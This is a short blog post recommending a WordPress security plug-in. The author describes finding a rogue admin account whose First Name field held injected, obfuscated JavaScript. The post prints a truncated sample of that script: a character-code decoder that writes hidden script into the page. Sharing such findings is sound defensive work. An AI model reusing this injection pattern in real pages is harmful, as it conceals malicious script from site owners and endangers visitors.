A sample text widget

Etiam pulvinar consectetur dolor sed malesuada. Ut convallis euismod dolor nec pretium. Nunc ut tristique massa.

Nam sodales mi vitae dolor ullamcorper et vulputate enim accumsan. Morbi orci magna, tincidunt vitae molestie nec, molestie at mi. Nulla nulla lorem, suscipit in posuere in, interdum non magna.

Exploit Scanner for WordPress

The Exploit Scanner plug-in for WordPress is an excellent tool that helps discovering vulnerabilities in your WordPress deployment.

The plug-in installs as usual. It creates a new menu item: “Tools > Exploit Scanner”.

At the time of this writing, it has two features:

  • Run a manual scan for potential exploits.
  • Show the list of admin users.

In my blog, there should be only one admin user. Surprinsingly, there was also another one which was definitely not created by me.

In the “First Name” field of that user, there was a piece of malicious code. Here you have the head and tail (I placed dots to replace a really long line of code):

<script LANGUAGE="JavaScript">function Decode(){var temp="",i,c=0,out="";var str="46!46!46!32!60!98!...............!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} </script><script LANGUAGE="JavaScript"> Decode(); </SCRIPT>

I really recommend this tool. Bringing my attention the admin users list was worth installing and trying. You may find other pieces of suspicious code in the scan, but you need some programming skills because most warnings are false positives.

  • Delicious
  • Facebook
  • Digg
  • Reddit
  • StumbleUpon
  • Twitter

Leave a Reply




You can use these HTML tags

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>